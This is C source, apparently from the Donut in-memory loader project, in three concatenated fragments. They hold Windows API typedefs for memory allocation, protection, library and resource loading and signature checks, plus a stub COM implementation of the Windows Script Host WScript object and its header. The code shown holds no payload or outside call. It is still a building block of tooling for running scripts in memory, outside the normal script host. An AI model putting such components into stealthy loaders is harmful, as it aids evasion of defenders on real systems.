265 | typedef BOOL (WINAPI *HttpSendRequest_t)( | |
266 | HINTERNET hRequest, | |
267 | LPCSTR lpszHeaders, | |
268 | DWORD dwHeadersLength, | |
269 | LPVOID lpOptional, | |
270 | DWORD dwOptionalLength); | |
271 | ||
272 | typedef BOOL (WINAPI *HttpQueryInfo_t)( | |
273 | HINTERNET hRequest, | |
274 | DWORD dwInfoLevel, | |
275 | LPVOID lpBuffer, | |
276 | LPDWORD lpdwBufferLength, | |
277 | LPDWORD lpdwIndex); | |
278 | ||
279 | typedef BOOL (WINAPI *InternetReadFile_t)( | |
280 | HINTERNET hFile, | |
281 | LPVOID lpBuffer, | |
282 | DWORD dwNumberOfBytesToRead, | |
283 | LPDWORD lpdwNumberOfBytesRead); | |
284 | ||
285 | typedef BOOL (WINAPI *InternetCloseHandle_t)( | |
286 | HINTERNET hInternet); | |
287 | ||
288 | typedef BOOL (WINAPI *CryptAcquireContext_t)( | |
289 | HCRYPTPROV *phProv, | |
290 | LPCSTR szContainer, | |
291 | LPCSTR szProvider, | |
292 | DWORD dwProvType, | |
293 | DWORD dwFlags); | |
294 | ||
295 | typedef void (WINAPI *GetSystemInfo_t)( | |
296 | LPSYSTEM_INFO lpSystemInfo); | |
297 | ||
298 | typedef SIZE_T (WINAPI *VirtualQuery_t)( | |
299 | LPCVOID lpAddress, | |
300 | PMEMORY_BASIC_INFORMATION lpBuffer, | |
301 | SIZE_T dwLength); | |
302 | ||
303 | typedef BOOL (WINAPI *VirtualProtect_t)( | |
304 | LPVOID lpAddress, | |
305 | SIZE_T dwSize, | |
306 | DWORD flNewProtect, | |
307 | PDWORD lpflOldProtect); | |
308 | ||
309 | typedef HMODULE (WINAPI *GetModuleHandleA_t)( | |
310 | LPCSTR lpModuleName); | |
311 | ||
312 | typedef HMODULE (WINAPI *LoadLibraryExA_t)( | |
313 | LPCSTR lpLibFileName, | |
314 | HANDLE hFile, | |
315 | DWORD dwFlags); | |
316 | ||
317 | typedef HMODULE (WINAPI *LoadLibraryExW_t)( | |
318 | LPCWSTR lpLibFileName, | |
319 | HANDLE hFile, | |
320 | DWORD dwFlags); | |
321 | ||
322 | typedef BOOL (WINAPI *CryptStringToBinaryA_t)( | |
323 | LPCSTR pszString, | |
324 | DWORD cchString, | |
325 | DWORD dwFlags, | |
326 | BYTE *pbBinary, | |
327 | DWORD *pcbBinary, | |
328 | DWORD *pdwSkip, | |
329 | DWORD *pdwFlags); | |
330 | ||
331 | typedef BOOL (WINAPI *CryptDecodeObjectEx_t)( | |
332 | DWORD dwCertEncodingType, | |
333 | LPCSTR lpszStructType, | |
334 | const BYTE *pbEncoded, | |
335 | DWORD cbEncoded, | |
336 | DWORD dwFlags, | |
337 | PCRYPT_DECODE_PARA pDecodePara, | |
338 | void *pvStructInfo, | |
339 | DWORD *pcbStructInfo); | |
340 | ||
341 | typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)( | |
342 | HCRYPTPROV hCryptProv, | |
343 | DWORD dwCertEncodingType, | |
344 | PCERT_PUBLIC_KEY_INFO pInfo, | |
345 | HCRYPTKEY *phKey); | |
346 | ||
347 | typedef BOOL (WINAPI *CryptCreateHash_t)( | |
348 | HCRYPTPROV hProv, | |
349 | ALG_ID Algid, | |
350 | HCRYPTKEY hKey, | |
351 | DWORD dwFlags, | |
352 | HCRYPTHASH *phHash); | |
353 | ||
354 | typedef BOOL (WINAPI *CryptHashData_t)( | |
355 | HCRYPTHASH hHash, | |
356 | const BYTE *pbData, | |
357 | DWORD dwDataLen, | |
358 | DWORD dwFlags); | |
359 | ||
360 | typedef BOOL (WINAPI *CryptVerifySignature_t)( | |
361 | HCRYPTHASH hHash, | |
362 | const BYTE *pbSignature, | |
363 | DWORD dwSigLen, | |
364 | HCRYPTKEY hPubKey, | |
365 | LPCSTR szDescription, | |
366 | DWORD dwFlags); | |
367 | ||
368 | typedef BOOL (WINAPI *CryptDestroyHash_t)( | |
369 | HCRYPTHASH hHash); | |
370 | ||
371 | typedef BOOL (WINAPI *CryptDestroyKey_t)( | |
372 | HCRYPTKEY hKey); | |
373 | ||
374 | typedef BOOL (WINAPI *CryptReleaseContext_t)( | |
375 | HCRYPTPROV hProv, | |
376 | DWORD dwFlags); | |
377 | ||
378 | typedef LPVOID (WINAPI *VirtualAlloc_t)( | |
379 | LPVOID lpAddress, | |
380 | SIZE_T dwSize, | |
381 | DWORD flAllocationType, | |
382 | DWORD flProtect); | |
383 | ||
384 | typedef BOOL (WINAPI *VirtualFree_t)( | |
385 | LPVOID lpAddress, | |
386 | SIZE_T dwSize, | |
387 | DWORD dwFreeType); | |
388 | ||
389 | typedef HLOCAL (WINAPI *LocalFree_t)( | |
390 | HLOCAL hMem); | |
391 | ||
392 | typedef HRSRC (WINAPI *FindResource_t)( | |
393 | HMODULE hModule, | |
394 | LPCSTR lpName, | |
395 | LPCSTR lpType); | |
396 | ||
397 | typedef HGLOBAL (WINAPI *LoadResource_t)( | |
398 | HMODULE hModule, | |
399 | HRSRC hResInfo); | |
400 | ||
401 | typedef LPVOID (WINAPI *LockResource_t)( | |
402 | HGLOBAL hResData); | |
403 | ||
404 | typedef DWORD (WINAPI *SizeofResource_t)( | |
405 | HMODULE hModule, | |
406 | HRSRC hResInfo); | |
407 | ||
408 | typedef void (WINAPI *RtlZeroMemory_t)( | |
409 | LPVOID Destination, | |
410 | SIZE_T Length); | |
411 | #endif | |
412 | ||
413 | ⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // initialize interface with methods/properties | |
32 | static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) { | |
33 | HRESULT hr; | |
34 | ||
35 | // IUnknown interface | |
36 | host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface); | |
37 | host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef); | |
38 | host->lpVtbl->Release = ADR(LPVOID, Host_Release); | |
39 | ||
40 | // IDispatch interface | |
41 | host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount); | |
42 | host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo); | |
43 | host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames); | |
44 | host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke); | |
45 | ||
46 | // IHost interface | |
47 | host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name); | |
48 | host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application); | |
49 | host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName); | |
50 | host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path); | |
51 | host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive); | |
52 | host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive); | |
53 | host->lpVtbl->Quit = ADR(LPVOID, Host_Quit); | |
54 | host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName); | |
55 | host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName); | |
56 | host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments); | |
57 | host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version); | |
58 | host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion); | |
59 | host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout); | |
60 | host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout); | |
61 | host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject); | |
62 | host->lpVtbl->Echo = ADR(LPVOID, Host_Echo); | |
63 | host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject); | |
64 | host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject); | |
65 | host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep); | |
66 | host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject); | |
67 | host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn); | |
68 | host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut); | |
69 | host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr); | |
70 | ||
71 | host->m_cRef = 0; | |
72 | host->inst = inst; | |
73 | ||
74 | DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe); | |
75 | hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib); | |
76 | ||
77 | if(hr == S_OK) { | |
78 | DPRINT("ITypeLib::GetTypeInfoOfGuid"); | |
79 | ||
80 | hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid( | |
81 | host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo); | |
82 | } | |
83 | DPRINT("HRESULT : %08lx", hr); | |
84 | return hr; | |
85 | } | |
86 | ||
87 | // Queries a COM object for a pointer to one of its interface. | |
88 | static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) { | |
89 | DPRINT("WScript::QueryInterface"); | |
90 | ||
91 | if(ppv == NULL) return E_POINTER; | |
92 | ||
93 | // we implement the following interfaces | |
94 | if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) || | |
95 | IsEqualIID(&iface->inst->xIID_IDispatch, riid) || | |
96 | IsEqualIID(&iface->inst->xIID_IHost, riid)) | |
97 | { | |
98 | *ppv = iface; | |
99 | return S_OK; | |
100 | } | |
101 | *ppv = NULL; | |
102 | return E_NOINTERFACE; | |
103 | } | |
104 | ||
105 | // Increments the reference count for an interface pointer to a COM object. | |
106 | static ULONG WINAPI Host_AddRef(IHost *iface) { | |
107 | DPRINT("WScript::AddRef"); | |
108 | ||
109 | _InterlockedIncrement(&iface->m_cRef); | |
110 | return iface->m_cRef; | |
111 | } | |
112 | ||
113 | // Decrements the reference count for an interface on a COM object. | |
114 | static ULONG WINAPI Host_Release(IHost *iface) { | |
115 | DPRINT("WScript::Release"); | |
116 | ||
117 | ULONG ref = _InterlockedDecrement(&iface->m_cRef); | |
118 | return ref; | |
119 | } | |
120 | ||
121 | // Retrieves the number of type information interfaces that an object provides (either 0 or 1). | |
122 | static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) { | |
123 | DPRINT("WScript::GetTypeInfoCount"); | |
124 | ||
125 | if(pctinfo == NULL) return E_POINTER; | |
126 | ||
127 | *pctinfo = 1; | |
128 | return S_OK; | |
129 | } | |
130 | ||
131 | // Retrieves the type information for an object, which can then be used to get the type information for an interface. | |
132 | static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) { | |
133 | DPRINT("WScript::GetTypeInfo"); | |
134 | ||
135 | if(ppTInfo == NULL) return E_POINTER; | |
136 | ||
137 | iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo); | |
138 | *ppTInfo = iface->lpTypeInfo; | |
139 | ||
140 | return S_OK; | |
141 | } | |
142 | ||
143 | // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs, | |
144 | // which can be used on subsequent calls to Invoke. | |
145 | static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid, | |
146 | LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) { | |
147 | DPRINT("WScript::GetIDsOfNames"); | |
148 | ||
149 | return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId); | |
150 | } | |
151 | ||
152 | // Provides access to properties and methods exposed by an object. | |
153 | // The dispatch function DispInvoke provides a standard implementation of Invoke. | |
154 | static HRESULT WINAPI Host_Invoke( | |
155 | IHost *iface, DISPID dispIdMember, REFIID riid, | |
156 | LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult, | |
157 | EXCEPINFO *pExcepInfo, UINT *puArgErr) { | |
158 | ||
159 | DPRINT("WScript::Invoke"); | |
160 | ||
161 | HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke( | |
162 | iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams, | |
163 | pVarResult, pExcepInfo, puArgErr); | |
164 | ||
165 | DPRINT("HRESULT : %08lx", hr); | |
166 | ||
167 | return hr; | |
168 | } | |
169 | ||
170 | // Returns the name of the WScript object (the host executable file). | |
171 | static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) { | |
172 | DPRINT("WScript::Name"); | |
173 | ||
174 | return S_OK; | |
175 | } | |
176 | ||
177 | static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) { | |
178 | DPRINT("WScript::Application"); | |
179 | ||
180 | return E_NOTIMPL; | |
181 | } | |
182 | ||
183 | // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe). | |
184 | static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) { | |
185 | DPRINT("WScript::FullName"); | |
186 | ||
187 | return E_NOTIMPL; | |
188 | } | |
189 | ||
190 | static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) { | |
191 | DPRINT("WScript::Path"); | |
192 | ||
193 | return E_NOTIMPL; | |
194 | } | |
195 | ||
196 | // Gets the script mode, or identifies the script mode. | |
197 | static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) { | |
198 | DPRINT("WScript::get_Interactive"); | |
199 | ||
200 | return E_NOTIMPL; | |
201 | } | |
202 | ||
203 | // Sets the script mode, or identifies the script mode. | |
204 | static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) { | |
205 | DPRINT("WScript::put_Interactive"); | |
206 | ||
207 | return E_NOTIMPL; | |
208 | } | |
209 | ||
210 | // Forces script execution to stop at any time. | |
211 | static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) { | |
212 | DPRINT("WScript::Quit(%i)", ExitCode); | |
213 | ||
214 | // if you know of a better way to do this..let me know. | |
215 | iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0); | |
216 | ||
217 | return S_OK; | |
218 | } | |
219 | ||
220 | // Returns the file name of the currently running script. | |
221 | static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) { | |
222 | DPRINT("WScript::ScriptName"); | |
223 | ||
224 | return E_NOTIMPL; | |
225 | } | |
226 | ||
227 | // Returns the full path of the currently running script. | |
228 | static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) { | |
229 | DPRINT("WScript::ScriptFullName"); | |
230 | ||
231 | return E_NOTIMPL; | |
232 | } | |
233 | ||
234 | // Returns the WshArguments object (a collection of arguments). | |
235 | static HRESULT WINAPI Host_get_Arguments( | |
236 | IHost *iface, void **out_Arguments) { // IArguments2 | |
237 | DPRINT("WScript::Arguments"); | |
238 | ||
239 | return E_NOTIMPL; | |
240 | } | |
241 | ||
242 | static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) { | |
243 | DPRINT("WScript::Version"); | |
244 | ||
245 | return E_NOTIMPL; | |
246 | } | |
247 | ||
248 | // Returns the Windows Script Host build version number. | |
249 | static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) { | |
250 | DPRINT("WScript::BuildVersion"); | |
251 | ||
252 | return E_NOTIMPL; | |
253 | } | |
254 | ||
255 | static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) { | |
256 | DPRINT("WScript::get_Timeout"); | |
257 | ||
258 | return E_NOTIMPL; | |
259 | } | |
260 | ||
261 | static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) { | |
262 | DPRINT("WScript::put_Timeout"); | |
263 | ||
264 | return E_NOTIMPL; | |
265 | } | |
266 | ||
267 | // Connects the object's event sources to functions with a given prefix. | |
268 | static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix, | |
269 | IDispatch **out_Dispatch) { | |
270 | DPRINT("WScript::CreateObject"); | |
271 | ||
272 | return E_NOTIMPL; | |
273 | } | |
274 | ||
275 | // Outputs text to either a message box or the command console window. | |
276 | static HRESULT WINAPI Host_Echo( | |
277 | IHost *iface, SAFEARRAY *args) { | |
278 | DPRINT("WScript::Echo"); | |
279 | ||
280 | return E_NOTIMPL; | |
281 | } | |
282 | ||
283 | // Retrieves an existing object with the specified ProgID, or creates a new one from a file. | |
284 | static HRESULT WINAPI Host_GetObject( | |
285 | IHost *iface, BSTR Pathname, BSTR ProgID, | |
286 | BSTR Prefix, IDispatch **out_Dispatch) { | |
287 | DPRINT("WScript::GetObject"); | |
288 | ||
289 | return E_NOTIMPL; | |
290 | } | |
291 | ||
292 | // Disconnects a connected object's event sources. | |
293 | static HRESULT WINAPI Host_DisconnectObject( | |
294 | IHost *iface, IDispatch *Object) { | |
295 | DPRINT("WScript::DisconnectObject"); | |
296 | ||
297 | return E_NOTIMPL; | |
298 | } | |
299 | ||
300 | // Suspends script execution for a specified length of time, then continues execution. | |
301 | static HRESULT WINAPI Host_Sleep( | |
302 | IHost *iface, LONG Time) { | |
303 | ||
304 | DPRINT("WScript::Sleep"); | |
305 | iface->inst->api.Sleep((DWORD)Time); | |
306 | ||
307 | return S_OK; | |
308 | } | |
309 | ||
310 | // Connects the object's event sources to functions with a given prefix. | |
311 | static HRESULT WINAPI Host_ConnectObject( | |
312 | IHost *iface, IDispatch *Object, BSTR Prefix) { | |
313 | DPRINT("WScript::ConnectObject"); | |
314 | ||
315 | return E_NOTIMPL; | |
316 | } | |
317 | ||
318 | // Exposes the read-only input stream for the current script. | |
319 | static HRESULT WINAPI Host_get_StdIn( | |
320 | IHost *iface, void **ppts) { // ppts is ITextStream | |
321 | DPRINT("WScript::StdIn"); | |
322 | ||
323 | return E_NOTIMPL; | |
324 | } | |
325 | ||
326 | // Exposes the write-only output stream for the current script. | |
327 | static HRESULT WINAPI Host_get_StdOut( | |
328 | IHost *iface, void **ppts) { // ppts is ITextStream | |
329 | DPRINT("WScript::StdOut"); | |
330 | ||
331 | return E_NOTIMPL; | |
332 | } | |
333 | ||
334 | // Exposes the write-only error output stream for the current script. | |
335 | static HRESULT WINAPI Host_get_StdErr( | |
336 | IHost *iface, void **ppts) { // ppts is ITextStream | |
337 | DPRINT("WScript::StdErr"); | |
338 | ||
339 | return E_NOTIMPL; | |
340 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef WSCRIPT_H | |
32 | #define WSCRIPT_H | |
33 | ||
34 | #include "../include/donut.h" | |
35 | ||
36 | typedef struct _IHost IHost; | |
37 | ||
38 | typedef struct _IHostVtbl { | |
39 | BEGIN_INTERFACE | |
40 | ||
41 | HRESULT (STDMETHODCALLTYPE *QueryInterface)( | |
42 | IHost *This, | |
43 | REFIID riid, | |
44 | void **ppvObject); | |
45 | ||
46 | ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This); | |
47 | ||
48 | ULONG (STDMETHODCALLTYPE *Release)(IHost *This); | |
49 | ||
50 | HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)( | |
51 | IHost *This, | |
52 | UINT *pctinfo); | |
53 | ||
54 | HRESULT (STDMETHODCALLTYPE *GetTypeInfo)( | |
55 | IHost *This, | |
56 | UINT iTInfo, | |
57 | LCID lcid, | |
58 | ITypeInfo **ppTInfo); | |
59 | ||
60 | HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)( | |
61 | IHost *This, | |
62 | REFIID riid, | |
63 | LPOLESTR *rgszNames, | |
64 | UINT cNames, | |
65 | LCID lcid, | |
66 | DISPID *rgDispId); | |
67 | ||
68 | HRESULT (STDMETHODCALLTYPE *Invoke)( | |
69 | IHost *This, | |
70 | DISPID dispIdMember, | |
71 | REFIID riid, | |
72 | LCID lcid, | |
73 | WORD wFlags, | |
74 | DISPPARAMS *pDispParams, | |
75 | VARIANT *pVarResult, | |
76 | EXCEPINFO *pExcepInfo, | |
77 | UINT *puArgErr); | |
78 | ||
79 | HRESULT (STDMETHODCALLTYPE *get_Name)( | |
80 | IHost *This, | |
81 | BSTR *out_Name); | |
82 | ||
83 | HRESULT (STDMETHODCALLTYPE *get_Application)( | |
84 | IHost *This, | |
85 | IDispatch **out_Dispatch); | |
86 | ||
87 | HRESULT (STDMETHODCALLTYPE *get_FullName)( | |
88 | IHost *This, | |
89 | BSTR *out_Path); | |
90 | ||
91 | HRESULT (STDMETHODCALLTYPE *get_Path)( | |
92 | IHost *This, | |
93 | BSTR *out_Path); | |
94 | ||
95 | HRESULT (STDMETHODCALLTYPE *get_Interactive)( | |
96 | IHost *This, | |
97 | VARIANT_BOOL *out_Interactive); | |
98 | ||
99 | HRESULT (STDMETHODCALLTYPE *put_Interactive)( | |
100 | IHost *This, | |
101 | VARIANT_BOOL v); | |
102 | ||
103 | HRESULT (STDMETHODCALLTYPE *Quit)( | |
104 | IHost *This, | |
105 | int ExitCode); | |
106 | ||
107 | HRESULT (STDMETHODCALLTYPE *get_ScriptName)( | |
108 | IHost *This, | |
109 | BSTR *out_ScriptName); | |
110 | ||
111 | HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)( | |
112 | IHost *This, | |
113 | BSTR *out_ScriptFullName); | |
114 | ||
115 | HRESULT (STDMETHODCALLTYPE *get_Arguments)( | |
116 | IHost *This, | |
117 | void **out_Arguments); | |
118 | ||
119 | HRESULT (STDMETHODCALLTYPE *get_Version)( | |
120 | IHost *This, | |
121 | BSTR *out_Version); | |
122 | ||
123 | HRESULT (STDMETHODCALLTYPE *get_BuildVersion)( | |
124 | IHost *This, | |
125 | int *out_Build); | |
126 | ||
127 | HRESULT (STDMETHODCALLTYPE *get_Timeout)( | |
128 | IHost *This, | |
129 | LONG *out_Timeout); | |
130 | ||
131 | HRESULT (STDMETHODCALLTYPE *put_Timeout)( | |
132 | IHost *This, | |
133 | LONG v); | |
134 | ||
135 | HRESULT (STDMETHODCALLTYPE *CreateObject)( | |
136 | IHost *This, | |
137 | BSTR ProgID, | |
138 | BSTR Prefix, | |
139 | IDispatch **out_Dispatch); | |
140 | ||
141 | HRESULT (STDMETHODCALLTYPE *Echo)( | |
142 | IHost *This, | |
143 | SAFEARRAY *args); | |
144 | ||
145 | HRESULT (STDMETHODCALLTYPE *GetObject)( | |
146 | IHost *This, | |
147 | BSTR Pathname, | |
148 | BSTR ProgID, | |
149 | BSTR Prefix, | |
150 | IDispatch **out_Dispatch); | |
151 | ||
152 | HRESULT (STDMETHODCALLTYPE *DisconnectObject)( | |
153 | IHost *This, | |
154 | IDispatch *Object); | |
155 | ||
156 | HRESULT (STDMETHODCALLTYPE *Sleep)( | |
157 | IHost *This, | |
158 | LONG Time); | |
159 | ||
160 | HRESULT (STDMETHODCALLTYPE *ConnectObject)( | |
161 | IHost *This, | |
162 | IDispatch *Object, | |
163 | BSTR Prefix); | |
164 | ||
165 | HRESULT (STDMETHODCALLTYPE *get_StdIn)( | |
166 | IHost *This, | |
167 | void **ppts); | |
168 | ||
169 | HRESULT (STDMETHODCALLTYPE *get_StdOut)( | |
170 | IHost *This, | |
171 | void **ppts); | |
172 | ||
173 | HRESULT (STDMETHODCALLTYPE *get_StdErr)( | |
174 | IHost *This, | |
175 | void **ppts); | |
176 | ||
177 | END_INTERFACE | |
178 | } IHostVtbl; | |
179 | ||
180 | typedef struct _IHost { | |
181 | IHostVtbl *lpVtbl; // virtual function table | |
182 | ITypeLib *lpTypeLib; // type library | |
183 | ITypeInfo *lpTypeInfo; // type information for WScript properties/methods | |
184 | IActiveScript *lpEngine; // IActiveScript engine from main thread | |
185 | ULONG m_cRef; // reference count | |
186 | PDONUT_INSTANCE inst; | |
187 | } IHost; | |
188 | ||
189 | static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host); | |
190 | ||
191 | // Queries a COM object for a pointer to one of its interface. | |
192 | static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv); | |
193 | ||
194 | // Increments the reference count for an interface pointer to a COM object. | |
195 | static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This); | |
196 | ||
197 | // Decrements the reference count for an interface on a COM object. | |
198 | static STDMETHODIMP_(ULONG) Host_Release(IHost *This); | |
199 | ||
200 | // Retrieves the number of type information interfaces that an object provides (either 0 or 1). | |
201 | static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo); | |
202 | ||
203 | // Retrieves the type information for an object, which can then be used to get the type information for an interface. | |
204 | static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo); | |
205 | ||
206 | // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs, | |
207 | // which can be used on subsequent calls to Invoke. | |
208 | static STDMETHODIMP Host_GetIDsOfNames( | |
209 | IHost *This, REFIID riid, LPOLESTR *rgszNames, | |
210 | UINT cNames, LCID lcid, DISPID *rgDispId); | |
211 | ||
212 | // Provides access to properties and methods exposed by an object. | |
213 | // The dispatch function DispInvoke provides a standard implementation of Invoke. | |
214 | static STDMETHODIMP Host_Invoke( | |
215 | IHost *This, DISPID dispIdMember, REFIID riid, | |
216 | LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult, | |
217 | EXCEPINFO *pExcepInfo, UINT *puArgErr); | |
218 | ||
219 | // Returns the name of the WScript object (the host executable file). | |
220 | static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name); | |
221 | ||
222 | static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch); | |
223 | ||
224 | // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe). | |
225 | static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path); | |
226 | ||
227 | static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path); | |
228 | ||
229 | // Gets the script mode, or identifies the script mode. | |
230 | static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive); | |
231 | ||
232 | // Sets the script mode, or identifies the script mode. | |
233 | static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v); | |
234 | ||
235 | // Forces script execution to stop at any time. | |
